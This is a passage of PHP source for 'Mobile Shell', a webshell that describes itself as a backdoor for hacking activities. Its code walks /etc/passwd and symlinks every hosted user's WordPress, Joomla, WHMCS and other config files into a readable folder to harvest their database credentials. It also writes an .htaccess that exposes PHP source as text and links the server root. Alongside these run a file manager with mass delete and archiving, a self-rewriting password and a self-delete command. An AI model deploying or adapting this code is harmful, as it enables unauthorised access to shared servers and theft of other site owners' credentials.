1034.     $valiases = '<a href="?symlink=valiases&dir='.$dir.'">OPEN</a>';
1035.     } else {
1036.     $valiases = '<font color="red">DISABLED</font>';
1037. }
1038. if(is_readable("/etc/passwd")){
1039.     $passwd = '<a href="?symlink=passwd&dir='.$dir.'">OPEN</a>';
1040.     } else {
1041.     $passwd = '<font color="red">DISABLED</font>';
1042.     }
1043. if(is_readable("/var/named")){
1044.     $var = '<a href="?symlink=var&dir='.$dir.'">OPEN</a>';
1045.     } else {
1046.     $var = '<font color="red">DISABLED</font>';
1047.     }  
1048. echo '<table class="table-info">';
1049.     echo '<th class="th-info">From</th>';
1050.     echo '<th class="th-info">Arrow</th>';
1051.     echo '<th class="th-info">Action</th>';
1052.     echo '<tr>';
1053.     echo '<td class="td-info"><span class="label-default">+</span> [ /etc/named.conf ]</td><td class="td-info"><center>&raquo;</center></td><td class="td-info"><center>'.$named.'</a></center></td>';
1054.     echo '<tr>';
1055.     echo '<td class="td-info"><span class="label-default">+</span> [ /etc/valiases ]</td><td class="td-info""><center>&raquo;</center></td><td class="td-info"><center>'.$valiases.'</a></center></td>';
1056.     echo '<tr>';
1057.     echo '<td class="td-info"><span class="label-default">+</span> [ /etc/passwd ]</td><td class="td-info"><center>&raquo;</center></td><td class="td-info"><center>'.$passwd.'</a></center></td>';
1058.     echo '<tr>';
1059.     echo '<td class="td-info"><span class="label-default">+</span> [ /var/named/ ]</td><td class="td-info"><center>&raquo;</center></td><td class="td-info"><center>'.$var.'</a></center></td>';
1060.     echo '</table>';
1061. @mkdir('pee',0777);
1062. @symlink("/","pee/root");
1063. $htaccss = "Options all
1064. DirectoryIndex Sux.html
1065. AddType text/plain .php
1066. AddHandler server-parsed .php
1067. AddType text/plain .html
1068. AddHandler txt .html
1069. Require None
1070. Satisfy Any";
1071. file_put_contents("pee/.htaccess",$htaccss);
1072. $ms_2 = file_get_contents("/etc/passwd");
1073. $ms_2z = explode("\n",$ms_2);
1074.    
1075.     foreach($ms_2z as $ms_3){
1076. $ms_1 = explode(":",$ms_3);
1077. error_reporting(0);
1078.  
1079. $ms_4 = posix_getcwd();
1080. $dr = explode("/",$ms_4);
1081.  
1082. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/wp-config.php',"pee/".$ms_1[0].'-WordPress.txt');
1083. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/blog/wp-config.php',"pee/".$ms_1[0].'-WordPress.txt');
1084. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/wp/wp-config.php',"pee/".$ms_1[0].'-WordPress.txt');
1085. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/site/wp-config.php',"pee/".$ms_1[0].'-WordPress.txt');
1086. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/config.php',"pee/".$ms_1[0].'-PhpBB.txt');
1087. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/includes/config.php',"pee/".$ms_1[0].'-vBulletin.txt');
1088. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/configuration.php',"pee/".$ms_1[0].'-Joomla.txt');
1089. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/web/configuration.php',"pee/".$ms_1[0].'-Joomla.txt');
1090. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/joomla/configuration.php',"pee/".$ms_1[0].'-Joomla.txt');
1091. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/site/configuration.php',"pee/".$ms_1[0].'-Joomla.txt');
1092. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/conf_global.php',"pee/".$ms_1[0].'-IPB.txt');
1093. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/inc/config.php',"pee/".$ms_1[0].'-MyBB.txt');
1094. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/Settings.php',"pee/".$ms_1[0].'-SMF.txt');
1095. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/sites/default/settings.php',"pee/".$ms_1[0].'-Drupal.txt');
1096. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/e107_config.php',"pee/".$ms_1[0].'-e107.txt');
1097. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/datas/config.php',"pee/".$ms_1[0].'-Seditio.txt');
1098. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/includes/configure.php',"pee/".$ms_1[0].'-osCommerce.txt');
1099. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/client/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
1100. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/clientes/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
1101. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/support/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
1102. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/supportes/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
1103. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/whmcs/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
1104. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/domain/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
1105. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/hosting/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
1106. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/whmc/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
1107. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/billing/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
1108. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/portal/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
1109. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/order/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
1110. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/clientarea/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
1111. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/domains/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt'); }
1112. }
1113.  
1114. elseif(isset($_REQUEST['symlink'])){
1115. switch ($_REQUEST['symlink']){
1116. case 'var':
1117. if(is_readable("/var/named")){
1118. echo '<div class="coL-panel"><table>
1119. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">SYMLINK [ VAR/NAMED ]</td></table></div>';
1120. echo '<table class="table-info">';
1121. echo '
1122. <th class="th-info">Website</th>
1123. <th class="th-info" style="width:60px">User</th>
1124. <th class="th-info" style="width:40px">Action</th>';
1125. $ms_5 = scandir("/var/named");
1126. foreach($ms_5 as $ms_6){
1127. if(strpos($ms_6,".db")){
1128. $i += 1;
1129. $ms_6 = str_replace('.db','',$ms_6);
1130. $owner = posix_getpwuid(fileowner("/etc/valiases/".$ms_6));
1131.  
1132. echo "<tr class='ex-hov'>
1133. <td class='td-info break'> <span class='label-default'>+</span>  <a href='http://".$ms_6." '>".$ms_6."</a></td>
1134. <td class='td-info'><center><font color='#1D9D73'>".$owner['name']."</font></center></td>
1135. <td class='td-info'><center><a href='pee/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a></center></td>";
1136.   }
1137. }
1138. echo "</table><div class='coL-option' style='padding:7px;margin-top:3px'>
1139. Total Domain : <font color='#1D9D73'>".$i."</font> </div>";
1140. }else{ echo "<tr><td class='td-info'>can't read [ /var/named ]</td></table>";
1141.     }
1142. break;
1143. }
1144.  
1145. switch ($_REQUEST['symlink']){
1146. case 'passwd':
1147. error_reporting(0);
1148. $etc = file_get_contents("/etc/passwd");
1149. $etcz = explode("\n",$etc);
1150. if(is_readable("/etc/passwd")){
1151. echo '<div class="coL-panel"><table>
1152. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">SYMLINK [ ETC/PASSWD ]</td></table></div>';
1153. echo '<table class="table-info">';
1154. echo '
1155. <th class="th-info">Website</th>
1156. <th class="th-info" style="width:60px">User</th>
1157. <th class="th-info" style="width:40px">Action</th>';
1158. $list = scandir("/var/named");
1159. foreach($etcz as $etz){
1160. $etcc = explode(":",$etz);
1161. foreach($list as $domain){
1162. if(strpos($domain,".db")){
1163. $domain = str_replace('.db','',$domain);
1164. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1165. if($owner['name'] == $etcc[0]) {
1166. $i += 1;
1167. echo "<tr class='ex-hov'><td class='td-info break'> <span class='label-default'>+</span>  <a href='http://".$domain." '>".$domain."</a></td>
1168. <td class='td-info'><center><font color='#1D9D73'>".$owner['name']."</font></center></td>
1169. <td class='td-info'><center><a href='pee/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a></center></td>";
1170. }}}}
1171. echo "</table><div class='coL-option' style='padding:7px;margin-top:3px'>
1172. Total Domain : <font color='#1D9D73'>".$i."</font> </div>";}
1173. break;
1174.     }
1175.  
1176. switch ($_REQUEST['symlink']){
1177. case 'named.conf':
1178. if(is_readable("/etc/named.conf")){
1179. echo '<div class="coL-panel"><table>
1180. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">SYMLINK [ ETC/NAMED.CONF ]</td></table></div>';
1181. echo '<table class="table-info">';
1182. echo '
1183. <th class="th-info">Website</th>
1184. <th class="th-info" style="width:60px">User</th>
1185. <th class="th-info" style="width:40px">Action</th>';
1186. $named = file_get_contents("/etc/named.conf");
1187. preg_match_all('%zone \"(.*)\" {%',$named,$domains);
1188. foreach($domains[1] as $domain){
1189. $domain = trim($domain);
1190. $i += 1;
1191. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1192. echo "<tr class='ex-hov'><td class='td-info break'> <span class='label-default'>+</span>  <a href='http://".$domain." '>".$domain."</a></td><td class='td-info'><center><font color='#1D9D73'>".$owner['name']."</font></center></td><td class='td-info'><center><a href='pee/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a></center></td>";
1193. }
1194. echo "</table><div class='coL-option' style='padding:7px;margin-top:3px'>
1195. Total Domain : <font color='#1D9D73'>".$i."</font> </div>";
1196. } else { echo "<tr><td class='td-info'>can't read [ /etc/named.conf ]</td></tr>"; }
1197. break;
1198. }
1199. switch ($_REQUEST['symlink']){
1200. case 'valiases':
1201. if(is_readable("/etc/valiases")){
1202. echo '<div class="coL-panel"><table>
1203. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">SYMLINK [ ETC/VALIASES ]</td></table></div>';
1204. echo '<table class="table-info">';
1205. echo '
1206. <th class="th-info">Website</th>
1207. <th class="th-info" style="width:60px">User</th>
1208. <th class="th-info" style="width:40px">Action</th>';
1209. $list = scandir("/etc/valiases");
1210. foreach($list as $domain){
1211. $i += 1;
1212. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1213. echo "<tr class='ex-hov'><td class='td-info break'> <span class='label-default'>+</span> <a href='http://".$domain."'>".$domain."</a></td><center><td class='td-info'><font color='#1D9D73'>".$owner['name']."</font></center></td><td class='td-info'><center><a href='pee/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a></center></td>";
1214. }
1215. echo "</table><div class='coL-option' style='padding:7px;margin-top:3px'>
1216. Total Domain : <font color='#1D9D73'>".$i."</font></div>";
1217. } else { echo "<tr><td class='td-info'>can't read [ /etc/valiases ]</td></tr>"; }
1218. break;
1219.     }
1220. }
1221.  
1222. // --- change password --- //
1223. elseif($_COEG['command'] == 'change') {
1224. echo('<div class="coL-panel"><table>
1225. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">CHANGE PASSWORD</td></table></div>');
1226. echo('<script>
1227. function validate(){
1228.             var a = document.getElementById("newpass").value;
1229.            var b = document.getElementById("confirm").value;
1230.            if (a!=b) {
1231.               $.alert({
1232.         icon: "fa fa-code",
1233.         title: "MOBILE SHELL",
1234.         content: "Password Do Not Match !!",
1235.           theme: "Dark",
1236.           type: "red",
1237.          });
1238.               return false;
1239.     }
1240. }
1241.     </script>');
1242. function xs($file){
1243.     return file_get_contents($file);
1244. }
1245. function chipt($plain){
1246.         return md5($plain);
1247. }
1248. function changepass($plain){
1249.     $npass = chipt($plain);
1250.     $npass = "\$pass = \"".$npass."\";";
1251.     $con = xs($_SERVER['SCRIPT_FILENAME']);
1252.     $con = preg_replace("/\\\$pass\ *=\ *[\"\']*([a-fA-F0-9]*)[\"\']*;/is",$npass,$con);
1253.     return file_put_contents($_SERVER['SCRIPT_FILENAME'], $con);
1254. }
1255.  
1256. if($_COEG['newpass']) {
1257. if(changepass($_COEG['newpass'])) {
1258. $q1 = 'Password Changed !!';
1259. $t1 = '?'.x5.$dir.'&'.x7.'logout';
1260. fauto2($q1, $t1);
1261. } else {  $alert = "Can't Change Password !!";
1262. failed1($alert);
1263.     }
1264. }
1265. echo "<div class='coL-option top'>
1266. <form method='post' onSubmit='return validate();' action='?".x7."change&".x5.$dir."'><table style='width:100%'>
1267. <td style='width:120px'>Password :</td><td style='width:75%'><input type='password' id='newpass' name='newpass' style='width:100%'></td>
1268. <tr>
1269. <td style='width:120px'>Confirm :</td><td style='width:75%'><input type='password' id='confirm' name='confirm' style='width:100%'></td>
1270. <tr>
1271. <td style='width:120px'></td><td style='width:75%'>
1272. <input type='submit' name='cps' class='btn-exe' value='Save' onclick='saveForm();return false;' style='width:100px'></td></table></form></div>";
1273. echo '<script>function saveForm(){
1274. if(document.getElementById("newpass").value == ""){
1275.       $.alert({
1276.         icon: "fa fa-code",
1277.         title: "MOBILE SHELL",
1278.         content: "Enter New Password !!",
1279.           theme: "Dark",
1280.           type: "red",
1281.          });
1282.      document.getElementById("newpass").focus();
1283.      return false;
1284.    }
1285. if(document.getElementById("confirm").value == ""){
1286.      $.alert({
1287.         icon: "fa fa-code",
1288.         title: "MOBILE SHELL",
1289.         content: "Confirm Your Password !!",
1290.           theme: "Dark",
1291.           type: "red",
1292.          });
1293.      return false;
1294.    }
1295.    document.getElementById("sks").submit();
1296.  }
1297. </script>';
1298. }
1299.  
1300. // --- kill me --- //
1301. elseif($_COEG['command'] == 'kill') {
1302. if(file_exists("MOBILE_SHELL.php"))
1303. unlink("MOBILE_SHELL.php");unlink(__FILE__);
1304.     $q1 = "Good By Baby :'(";
1305.     $t1 = "http://underxploit.blogspot.com";
1306.     fauto2($q1, $t1);
1307. }
1308.  
1309. // --- about me --- //
1310. elseif($_COEG['command'] == 'about') {
1311.   echo '<div class="coL-panel"><table>
1312. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">DESCRIPTION</td></table></div>';
1313. echo '<div class="coL-option" style="padding:7px">
1314. &nbsp; &nbsp; Mobile Shell is a shell script backdoor / webshell that I designed specifically for mobile users, you can use this script for hacking activities or just to FileManager for your website.
1315. <br><br>
1316. Unlike the other shell is created for PC users if used via mobile phones will be very difficult.
1317. <br><br>
1318. The advantages of this script is very easy and more comfortable when in use via mobile phone (Responsive), plus the script is very light.</div>
1319. <div class="coL-panel top"><table>
1320. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">MEANING OF SYMBOL [ ICON ]</td></table></div>
1321. <table class="table-info">
1322. <tr class="ex-hov">
1323. <td style="width:85px" align="center" class="td-info"><i class="fa fa-eye"></i></td> <td class="td-info">: View Source</td>
1324. <tr class="ex-hov">
1325. <td style="width:85px" align="center" class="td-info"><i class="fa fa-pencil"></i></td> <td class="td-info">: Edit Source</td>
1326. <tr class="ex-hov">
1327. <td style="width:85px" align="center" class="td-info"><i class="fa fa-edit"></i></td> <td class="td-info">: Change Name [ Rename ]</td>
1328. <tr class="ex-hov">
1329. <td style="width:85px" align="center" class="td-info"><i class="fa fa-cogs"></i></td> <td class="td-info">: Chmod [ Change Permission ]</td>
1330. <tr class="ex-hov">
1331. <td style="width:85px" align="center" class="td-info"><i class="fa fa-trash"></i></td> <td class="td-info">: Delete</td>
1332. </table>
1333.  
1334. <div class="coL-panel top"><table>
1335. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">MEANING OF SYMBOL [ ALPHABET ]</td></table></div>
1336. <table class="table-info"><tr class="ex-hov">
1337. <td style="width:85px" align="center" class="td-info">[ U ]</td> <td class="td-info">: Upload [ In Directory ]</td>
1338. <tr class="ex-hov">
1339. <td style="width:85px" align="center" class="td-info">[ R ]</td> <td class="td-info">: Rename</td>
1340. <tr class="ex-hov">
1341. <td style="width:85px" align="center" class="td-info">[ D ]</td> <td class="td-info">: Delete</td>
1342. <tr class="ex-hov">
1343. <td style="width:85px" align="center" class="td-info">[ ND ]</td> <td class="td-info">: Create New Directory</td>
1344. <tr class="ex-hov">
1345. <td style="width:85px" align="center" class="td-info">[ NF ]</td> <td class="td-info">: Create New File</td>
1346. <tr class="ex-hov">
1347. <td style="width:85px" align="center" class="td-info">[ OPEN ]</td> <td class="td-info">: Open Properties</td>
1348. <tr class="ex-hov">
1349. <td style="width:85px" align="center" class="td-info">[ COPY ]</td> <td class="td-info">: Copy File / Directory</td>
1350. <tr class="ex-hov">
1351. <td style="width:85px" align="center" class="td-info">[ MOVE ]</td> <td class="td-info">: Move File / Directory</td>
1352. <tr class="ex-hov">
1353. <td style="width:85px" align="center" class="td-info">[ DELETE ]</td> <td class="td-info">: Delete File / Directory</td>
1354. </table>
1355. <div class="coL-panel top"><table>
1356. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">CREDITS</td></table></div>
1357. <table class="table-info">
1358. <tr class="ex-hov">
1359. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Name</td> <td class="td-info">: Mobile Shell</td>
1360. <tr class="ex-hov">
1361. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Version</td> <td class="td-info">: 0.5 [ 4th Edition ]</td>
1362. <tr class="ex-hov">
1363. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Author</td> <td class="td-info">: Wildan Izzudin</td>
1364. <tr class="ex-hov">
1365. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Email</td> <td class="td-info break">: <a class="a" href="mailto:underxploit@gmail.com">underxploit@gmail.com</a></td>
1366. <tr class="ex-hov">
1367. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Facebook</td> <td class="td-info break">:  <a class="a" href="http://www.facebook.com/WILDAN.OFFICIAL">http://fb.me/WILDAN.OFFICIAL</a></td>
1368. <tr class="ex-hov">
1369. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Blog</td> <td class="td-info">: <a class="a" href="http://underxploit.blogspot.co.id">http://underxploit.blogspot.co.id</a></td></table>
1370. <div class="coL-option to">
1371. <center><br>If there is any suggestion or feedback please contact me through the contact above.<br><br><center><br>&mdash; Thank You &mdash;</center></div>';
1372. }
1373.  
1374. // --- logout --- //
1375. elseif ($_COEG['command'] == 'logout') {   
1376. r($_SERVER['PHP_SELF']);
1377. setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
1378. }  
1379.  
1380. // --- mass action --- //
1381. else {
1382. $hc = @getcwd();
1383. if(isset($_COEG['location']))
1384.     @chdir($_COEG['location']);
1385. $cwd = @getcwd();
1386. if($os == 'win') {
1387.     $hc = str_replace("\\", "/", $hc);
1388.     $cwd = str_replace("\\", "/", $cwd);
1389. }
1390. if($cwd[strlen($cwd)-1] != '/')
1391.     $cwd .= '/';
1392.  
1393. function hs($d) {
1394.     if(function_exists("scandir")) {
1395.         return scandir($d);
1396.     } else {
1397.         $dh  = opendir($d);
1398.         while (false !== ($filename = readdir($dh)))
1399.             $data[] = $filename;
1400.         return $data;
1401.     }
1402. }
1403.   if(!empty($_COOKIE['msv5']))
1404.         $_COOKIE['msv5'] = @unserialize($_COOKIE['msv5']);
1405.      
1406.     if(!empty($_COEG['hcx'])) {
1407.         switch($_COEG['hcx']) {
1408.             case 'mkdir':
1409.                 if(!@mkdir($_COEG['p2']))
1410.                     echo "Can't create new dir";
1411.                 break;
1412.             case 'delete':
1413.                 function deleteDir($path) {
1414.                     $path = (substr($path,-1)=='/') ? $path:$path.'/';
1415.                     $dh  = opendir($path);
1416.                     while ( ($r = readdir($dh) ) !== false) {
1417.                         $r = $path.$r;
1418.                         if ( (basename($r) == "..") || (basename($r) == ".") )
1419.                             continue;
1420.                         $type = filetype($r);
1421.                         if ($type == "dir")
1422.                             deleteDir($r);
1423.                         else
1424.                             @unlink($r);
1425.                     }
1426.                     closedir($dh);
1427.                     @rmdir($path);
1428.                 }
1429.                 if(is_array(@$_COEG['msv5']))
1430.                     foreach($_COEG['msv5'] as $f) {
1431.                         if($f == '..')
1432.                             continue;
1433.                         $f = urldecode($f);
1434.                         if(is_dir($f))
1435.                             deleteDir($f);
1436.                         else
1437.                             @unlink($f);
1438.                     }
1439.                 break;
1440.             case 'paste':
1441.                 if($_COOKIE['act'] == 'copy') {
1442.                     function copy_paste($c,$s,$d){
1443.                         if(is_dir($c.$s)){
1444.                             mkdir($d.$s);
1445.                             $h = @opendir($c.$s);
1446.                             while (($f = @readdir($h)) !== false)
1447.                                 if (($f != ".") and ($f != ".."))
1448.                                     copy_paste($c.$s.'/',$f, $d.$s.'/');
1449.                         } elseif(is_file($c.$s))
1450.                             @copy($c.$s, $d.$s);
1451.                     }
1452.                     foreach($_COOKIE['msv5'] as $f)
1453.                         copy_paste($_COOKIE['location'],$f, $GLOBALS['cwd']);
1454.                 } elseif($_COOKIE['act'] == 'move') {
1455.                     function move_paste($c,$s,$d){
1456.                         if(is_dir($c.$s)){
1457.                             mkdir($d.$s);
1458.                             $h = @opendir($c.$s);
1459.                             while (($f = @readdir($h)) !== false)
1460.                                 if (($f != ".") and ($f != ".."))
1461.                                     copy_paste($c.$s.'/',$f, $d.$s.'/');
1462.                         } elseif(@is_file($c.$s))
1463.                             @copy($c.$s, $d.$s);
1464.                     }
1465.                     foreach($_COOKIE['msv5'] as $f)
1466.                         @rename($_COOKIE['location'].$f, $GLOBALS['cwd'].$f);
1467.                 } elseif($_COOKIE['act'] == 'zip') {
1468.                     if(class_exists('ZipArchive')) {
1469.                         $zip = new ZipArchive();
1470.                         if ($zip->open($_COEG['p2'], 1)) {
1471.                             chdir($_COOKIE['location']);
1472.                             foreach($_COOKIE['msv5'] as $f) {
1473.                                 if($f == '..')
1474.                                     continue;
1475.                                 if(@is_file($_COOKIE['location'].$f))
1476.                                     $zip->addFile($_COOKIE['location'].$f, $f);
1477.                                 elseif(@is_dir($_COOKIE['location'].$f)) {
1478.                                     $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS));
1479.                                     foreach ($iterator as $key=>$value) {
1480.                                         $zip->addFile(realpath($key), $key);
1481.                                     }
1482.                                 }
1483.                             }
1484.                             chdir($GLOBALS['cwd']);
1485.                             $zip->close();
1486.                         }
1487.                     }
1488.                 } elseif($_COOKIE['act'] == 'unzip') {
1489.                     if(class_exists('ZipArchive')) {
1490.                         $zip = new ZipArchive();
1491.                         foreach($_COOKIE['msv5'] as $f) {
1492.                             if($zip->open($_COOKIE['location'].$f)) {
1493.                                 $zip->extractTo($GLOBALS['cwd']);
1494.                                 $zip->close();
1495.                             }
1496.                         }
1497.                     }
1498.                 } elseif($_COOKIE['act'] == 'tar') {
1499.                     chdir($_COOKIE['location']);
1500.                     $_COOKIE['msv5'] = array_map('escapeshellarg', $_COOKIE['msv5']);
1501.                     ex('tar cfzv ' . escapeshellarg($_COEG['p2']) . ' ' . implode(' ', $_COOKIE['msv5']));
1502.                     chdir($GLOBALS['cwd']);
1503.                 }
1504.                 unset($_COOKIE['msv5']);
1505.                 setcookie('msv5', '', time() - 3600);
1506.                 break;
1507.             default:
1508.                 if(!empty($_COEG['hcx'])) {
1509.                     vb('act', $_COEG['hcx']);
1510.                     vb('msv5', serialize(@$_COEG['msv5']));
1511.                     vb('location', @$_COEG['location']);
1512.                 }
1513.                 break;
1514.         }
1515.     }
1516. echo('<script>function m1s(){
1517. if(document.getElementById("act").value == ""){
1518.      $.alert ({
1519.         icon: "fa fa-code",
1520.         title: "MOBILE SHELL",
1521.         content: "Select Action !!",
1522.         theme: "Dark",
1523.         type: "red",
1524.         });
1525.      return false;
1526.    }
1527.    document.getElementById("sks").submit();
1528.  }
1529. </script>');
1530. echo('<form name="data" action="?dir='.$dir.'" method="POST" style="margin:0px">');
1531. echo('<div class="coL-panel"><table><td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">FILE MANAGER</td></table></div>');
1532.        
1533.     $dirContent = hs(isset($_COEG['location'])?$_COEG['location']:$GLOBALS['cwd']);
1534.     if($dirContent === false) {    echo 'Can\'t open this folder!';hardFooter(); return; }
1535.     global $sort;
1536.     $sort = array('name', 1);
1537.     if(!empty($_COEG['hcx'])) {
1538.         if(preg_match('!s_([A-z]+)_(\d{1})!', $_COEG['hcx'], $match))
1539.             $sort = array($match[1], (int)$match[2]);
1540.     }
1541. echo('<script language="JavaScript">
1542. function toggle(source) {
1543.  checkboxes = document.getElementsByName("msv5[]");
1544.  for(var i=0, n=checkboxes.length;i<n;i++) {
1545.    checkboxes[i].checked = source.checked;
1546.  }
1547. }
1548. </script>');
1549. echo('<table class="table-file" cellspacing="0">
1550. <th class="th-file">Name</th>
1551. <th class="th-file" style="width:80px">Size</th>
1552. <th class="th-file" style="width:65px">Action</th>
1553. <th class="th-file"></th>
1554. <tr>');
1555. $dir = getcwd();
1556. $scn = scandir($dir);
1557.         foreach($scn as $dirx) {
1558.         $dtype = filetype("$dir/$dirx");
1559.  if(!is_dir("$dir/$dirx")) continue;
1560.             if($dirx === '..') {
1561.                 $href = '<a class="a" href="?'.x5.dirname($dir).'">'.$dirx.'</a>';
1562.             }
1563. elseif($dirx === '.') {
1564.                 $href = '<a class="a" href="?'.x5.$dir.'">'.$dirx.'</a>';
1565.             } else {
1566.                 $href = '<a class="a" href="?dir='.$dir.'/'.$dirx.'">'.$dirx.'</a>';
1567.             }
1568.             if($dirx === '.' || $dirx === '..') {
1569.                 $d_zx = "<font color='#FF0000'>&mdash;&mdash;</font>";
1570.                 $ckh = '<input type="checkbox" disabled>';
1571.             } else {
1572.                 $d_zx = "<a class='a' href='?command=upload&dir=$dir/$dirx'>U</a> |
1573. <a class='a' href='?command=renadir&dir=$dir/$dirx'>R</a> | <a class='a' href='?command=deledir&dir=$dir/$dirx'>D</a>";
1574.                 $ckh = '<input type="checkbox" value="'.basename($dirx).'" name="msv5[]">';
1575.             }
1576.  echo "<tr class='ex-hov'>";
1577.             echo "<td class='td-file break'><i class='fa fa-folder-o'></i>&nbsp; [ $href
1578. ]</td>";
1579.     echo "<td align='center' class='td-file'><center>&mdash;&mdash;</center></th>";
1580.     echo "<td align='center' class='td-file'>$d_zx</td>";
1581.     echo "<td align='center' class='td-file' style='width:10px'>".$ckh."</td>";
1582.         }
1583.         echo "</tr>";
1584. foreach($scn as $file) {
1585.             $ftype = filetype("$dir/$file");
1586.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
1587.             $size = filesize("$dir/$file")/1024;
1588.             $size = round($size,3);
1589.             if($size > 1024) {
1590.                 $size = round($size/1024,2). 'MB';
1591.             } else {
1592.                 $size = $size. 'KB';
1593.             }
1594.             if(!is_file("$dir/$file")) continue;
1595.             echo "<tr class='ex-hov'>";
1596.             echo '<td class=\'td-file break\'><i class="fa fa-file-o"></i>&nbsp; <a class="a" href="?'.x7.'view&'.x5.$dir.'&'.x6.$dir.'/'.$file.'">'.$file.'</a></td>';
1597.             echo "<td align='center' class='td-file'>$size</td>";
1598.             echo "<td align='center' class='td-file'>";
1599.             echo '<a class="a" href="?command=edit&dir='.$dir.'&file='.$dir.'/'.$file.'">OPEN</a></td>';
1600.             echo "<td align='center' class='td-file' style='width:10px'><input type='checkbox' name='msv5[]' value='".$file."'> </td>";
1601. }
1602.     echo "</table><table style='width:100%;margin-top:2px' cellspacing='0'>
1603. <td style='width:10%;text-align:left;padding-left:7px'><input type=checkbox onClick=toggle(this)></td>
1604.    <input type=hidden name=ne value=''>
1605.    <input type=hidden name=location value='" . htmlspecialchars($GLOBALS['cwd']) . "'>
1606.    <input type=hidden name=charset value='". (isset($_COEG['charset'])?$_COEG['charset']:'')."'>
1607.    <td style='width:70%'><select name='hcx' style='width:100%' id='act'>";
1608.  if(!empty($_COOKIE['act']) && @count($_COOKIE['msv5']))
1609.     echo("<option value='paste'>Paste</option>");
1610.     echo("<option value=''>&mdash;&mdash; Select Action &mdash;&mdash;</option><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>");
1611. if(class_exists('ZipArchive'))
1612.     echo("<option value='zip'>Compress (.zip)</option>");
1613.     echo("</select></td>");
1614.     if(!empty($_COOKIE['act']) && @count($_COOKIE['msv5']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
1615.     echo("<input class='top' type=text name=p2 value='".rand(0,100)."-" . date("Y-m-d") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'>");
1616.     echo "<td style='width:20%;text-align:right'><input type='submit' onclick='m1s(); return false;' value='GO' class='btn-exe'></td></form></table>";
1617.     if(isset($_COEG['ndir'])) {
1618.     $cdir = $_COEG['newinput'];
1619.     if (is_dir($dir.'/'.$cdir)) {
1620. $q1 = 'Directory Already Exist !!';
1621. echo failed1($q1);
1622.     } else {
1623.         if(mkdir($dir.'/'.$cdir, 0777)) {
1624. $q1 = 'Directory Created ^_^';
